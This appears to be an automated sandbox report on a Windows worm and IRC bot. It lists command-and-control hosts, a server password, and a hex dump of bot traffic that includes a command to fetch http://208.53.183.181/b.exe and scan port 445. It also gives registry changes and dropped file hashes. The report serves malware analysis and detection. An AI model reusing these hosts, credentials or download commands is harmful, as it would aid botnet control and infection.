ms4all.twoplayers.net

Remote Host       Port Number
112.78.112.208    80
195.2.252.21      80
204.45.118.250    80
204.45.121.50     80
218.85.133.201    80
123.0.41.218      3128
24.63.206.135     3128
62.103.174.192    3128
82.38.141.57      3128
204.45.85.218     57221   (PASS laorosr)
209.90.137.223    1199

USER SP2-743 * 0 :COMPUTERNAME
MODE #! -ix
MODE #Ma -ix
MODE [N00_USA_XP_7728388]@ -ix
MODE #dpi -ix

00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR
00000010 | 5256 4D53 4720 2369 203A 4854 5450 2053 | RVMSG #i :HTTP S
00000020 | 4554 2068 7474 703A 2F2F 3230 382E 3533 | ET http://208.53
00000030 | 2E31 3833 2E31 3831 2F62 2E65 7865 0D0A | .183.181/b.exe..
00000040 | 4E43 494B 205B 4E30 305F 5553 415F 5850 | NCIK [N00_USA_XP
00000050 | 5F37 3732 3833 3838 5D18 E740 0D0A 5052 | _7728388]..@..PR
00000060 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
00000070 | 505F 3737 3238 BCB9 4020 3A73 6361 6E2F | P_7728..@ :scan/
00000080 | 2F20 5472 7969 6E67 2074 6F20 6765 7420 | / Trying to get
00000090 | 6578 7465 726E 616C 2049 502E 0D0A 5052 | external IP...PR
000000A0 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
000000B0 | 505F 3737 3238 BCB9 4020 3A73 6361 6E2F | P_7728..@ :scan/
000000C0 | 2F20 5261 6E64 6F6D 2050 6F72 7420 5363 | / Random Port Sc
000000D0 | 616E 2073 7461 7274 6564 206F 6E20 3139 | an started on 19
000000E0 | 322E 782E 782E 783A 3434 3520 7769 7468 | 2.x.x.x:445 with
000000F0 | 2061 2064 656C 6179 206F 6620 3520 7365 | a delay of 5 se
00000100 | 636F 6E64 7320 666F 7220 3020 6D69 6E75 | conds for 0 minu
00000110 | 7465 7320 7573 696E 6720 3235 2074 6872 | tes using 25 thr
00000120 | 6561 6473 2E0D 0A50 5252 564D 5347 205B | eads...PRRVMSG [
00000130 | 4E30 305F 5553 415F 5850 5F37 3732 38BC | N00_USA_XP_7728.
00000140 | B940 203A 7363 616E 2F2F 2054 7279 696E | .@ :scan// Tryin
00000150 | 6720 746F 2067 6574 2065 7874 6572 6E61 | g to get externa
00000160 | 6C20 4950 2E0D 0A50 5252 564D 5347 205B | l IP...PRRVMSG [
00000170 | 4E30 305F 5553 415F 5850 5F37 3732 38BC | N00_USA_XP_7728.
00000180 | B940 203A 7363 616E 2F2F 2052 616E 646F | .@ :scan// Rando
00000190 | 6D20 506F 7274 2053 6361 6E20 7374 6172 | m Port Scan star
000001A0 | 7465 6420 6F6E 2031 3932 2E31 3638 2E78 | ted on 192.168.x
000001B0 | 2E78 3A34 3435 2077 6974 6820 6120 6465 | .x:445 with a de
000001C0 | 6C61 7920 6F66 2035 2073 6563 6F6E 6473 | lay of 5 seconds
000001D0 | 2066 6F72 2030 206D 696E 7574 6573 2075 | for 0 minutes u
000001E0 | 7369 6E67 2032 3520 7468 7265 6164 732E | sing 25 threads.
000001F0 | 0D0A 5052 5256 4D53 4720 5B4E 3030 5F55 | ..PRRVMSG [N00_U
00000200 | 5341 5F58 505F 3737 3238 BCB9 4020 3A73 | SA_XP_7728..@ :s
00000210 | 6361 6E2F 2F20 5365 7175 656E 7469 616C | can// Sequential
00000220 | 2050 6F72 7420 5363 616E 2073 7461 7274 | Port Scan start
00000230 | 6564 206F 6E20 3139 322E 3136 382E 302E | ed on 192.168.0.
00000240 | 303A 3434 3520 7769 7468 2061 2064 656C | 0:445 with a del
00000250 | 6179 206F 6620 3520 7365 636F 6E64 7320 | ay of 5 seconds
00000260 | 666F 7220 3020 6D69 6E75 7465 7320 7573 | for 0 minutes us
00000270 | 696E 6720 3230 2074 6872 6561 6473 2E0D | ing 20 threads..
00000280 | 0A50 5252 564D 5347 205B 4E30 305F 5553 | .PRRVMSG [N00_US
00000290 | 415F 5850 5F37 3732 38BC B940 203A 7363 | A_XP_7728..@ :sc
000002A0 | 616E 2F2F 2053 6571 7565 6E74 6961 6C20 | an// Sequential
000002B0 | 506F 7274 2053 6361 6E20 7374 6172 7465 | Port Scan starte
000002C0 | 6420 6F6E 2031 3932 2E31 3638 2E38 302E | d on 192.168.80.
000002D0 | 303A 3434 3520 7769 7468 2061 2064 656C | 0:445 with a del
000002E0 | 6179 206F 6620 3520 7365 636F 6E64 7320 | ay of 5 seconds
000002F0 | 666F 7220 3020 6D69 6E75 7465 7320 7573 | for 0 minutes us
00000300 | 696E 6720 3230 2074 6872 6561 6473 2E0D | ing 20 threads..
00000310 | 0A50 5252 564D 5347 205B 4E30 305F 5553 | .PRRVMSG [N00_US
00000320 | 415F 5850 5F37 3732 38BC B940 203A 7363 | A_XP_7728..@ :sc
00000330 | 616E 2F2F 2053 6571 7565 6E74 6961 6C20 | an// Sequential
00000340 | 506F 7274 2053 6361 6E20 7374 6172 7465 | Port Scan starte
00000350 | 6420 6F6E 2031 3932 2E30 2E30 2E30 3A34 | d on 192.0.0.0:4
00000360 | 3435 2077 6974 6820 6120 6465 6C61 7920 | 45 with a delay
00000370 | 6F66 2035 2073 6563 6F6E 6473 2066 6F72 | of 5 seconds for
00000380 | 2030 206D 696E 7574 6573 2075 7369 6E67 | 0 minutes using
00000390 | 2031 3020 7468 7265 6164 732E 0D0A 7365 | 10 threads...se
000003A0 | 6E64 2023 212C 234D 6120 6F6F 6F6F 0D0A | nd #!,#Ma oooo..

* The data identified by the following URLs was then requested from the remote web server:

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_ASYNCMAC
o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_ASYNCMAC\0000
o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_ASYNCMAC
o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_ASYNCMAC\0000

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_ASYNCMAC\0000]
+ Service = "AsyncMac"
+ Legacy = 0x00000001
+ ConfigFlags = 0x00000000
+ Class = "LegacyDriver"
+ ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
+ DeviceDesc = "RAS Asynchronous Media Driver"
+ Capabilities = 0x00000000
o [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_ASYNCMAC]
+ NextInstance = 0x00000001
o [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_ASYNCMAC\0000]
+ Service = "AsyncMac"
+ Legacy = 0x00000001
+ ConfigFlags = 0x00000000
+ Class = "LegacyDriver"
+ ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
+ DeviceDesc = "RAS Asynchronous Media Driver"
+ Capabilities = 0x00000000
o [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_ASYNCMAC]
+ NextInstance = 0x00000001

File System Modifications

* The following files were created in the system:

(Columns of the original table: #, Filename(s), File Size, File Hash, Alias)

o #1: %CommonAppData%\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_a7bcc1a4-f7a4-4502-8650-8579e607f7f7
+ File Size: 47 bytes
+ File Hash: MD5 0x64BC6B0E1D907AE8ACF27BDB155344C2, SHA-1 0x7AA0D9AF2D61D73A044F288E16FDD07813C972BA
+ Alias: (not available)

o #2: %AppData%\ohydy.exe, [file and pathname of the sample #1]
+ File Size: 82 944 bytes
+ File Hash: MD5 0xDB6785A8DFAB9EEFFD87A2D1AC4C1825, SHA-1 0x973B4CDEA43A8CFD1540B4248D7366D70E9582EB
+ Alias: Worm.Win32.AutoRun.bntt [Kaspersky Lab]; Troj/Pincav-I [Sophos]; Trojan:Win32/Rimecud.A [Microsoft]

o #3: %Temp%\1138.exe, %Windir%\cfdrive32.exe
+ File Size: 86 016 bytes
+ File Hash: MD5 0x5CCE5D43CD187C397FEAA68019FDA0D3, SHA-1 0x5FB0F83189196F412FEE82820117FC3CE09654EA
+ Alias: (not available)

o #4: %Temp%\36053.exe, c:\RECYCLER\S-1-5-21-0243936033-3052116371-381863308-1811\vsbntlo.exe
+ File Size: 69 632 bytes
+ File Hash: MD5 0x6F1229CF9564C74389D3231E72990928, SHA-1 0x6BA0ED0E792E19A3D9DBB5FC9847FB2E6BE3FE07
+ Alias: Trojan:Win32/Meredrop [Microsoft]

o #5: %Temp%\6219578.exe, c:\lsass.exe
+ File Size: 25 088 bytes
+ File Hash: MD5 0x00E1EF60617FA28C0FF5E83274FA0C03, SHA-1 0x4422D228A354ECFF0FC80DBC0D9CBF674AB671C6
+ Alias: Suspicious.MH690 [Symantec]; Mal/Zlob-AG [Sophos]; Trojan-Downloader.Agent [Ikarus]; Win-Trojan/Cson3.Gen [AhnLab]; packed with UPX [Kaspersky Lab]

o #6: %Temp%\629.exe
+ File Size: 2 172 bytes
+ File Hash: MD5 0x2DB236EC4F6C85C93F3F2089B3EE31E7, SHA-1 0x5BA48A4A2FBED436DA83CB201CC6F3F8DD091404
+ Alias: (not available)

o #7: %Temp%\998935.exe
+ File Size: 2 162 bytes
+ File Hash: MD5 0x2E174D69715E40C41274F776438F479F, SHA-1 0x91373F9DBF5E327BF2D27D886B4B20E104C2410B
+ Alias: (not available)

o #8: %Temp%\ftvslix.exe
+ File Size: 21 504 bytes
+ File Hash: MD5 0x2F50AFAFB174303A56E1B4F6E4C6192D, SHA-1 0xAA0ED5E78AB4E9B78D9CD5E2543028F5B3A5F5B5
+ Alias: Trojan:Win32/Meredrop [Microsoft]

o #9: c:\RECYCLER\S-1-5-21-0243936033-3052116371-381863308-1811\Desktop.ini
+ File Size: 63 bytes
+ File Hash: MD5 0xE783BDD20A976EAEAAE1FF4624487420, SHA-1 0xC2A44FAB9DF00B3E11582546B16612333C2F9286
+ Alias: (not available)

o #10: %System%\drivers\asyncmac.sys.bak
+ File Size: 14 336 bytes
+ File Hash: MD5 0x02000ABF34AF4C218C35D257024807D6, SHA-1 0x4BD208ABCAB95B6E14E966EAB395BCDE461B839E
+ Alias: packed with PE_Patch [Kaspersky Lab]

o #11: %System%\drivers\atmarpc.sys.bak
+ File Size: 59 904 bytes
+ File Hash: MD5 0xEC88DA854AB7D7752EC8BE11A741BB7F, SHA-1 0x6DF1AA383BA018086A5B15E551003995A44D7696
+ Alias: packed with PE_Patch [Kaspersky Lab]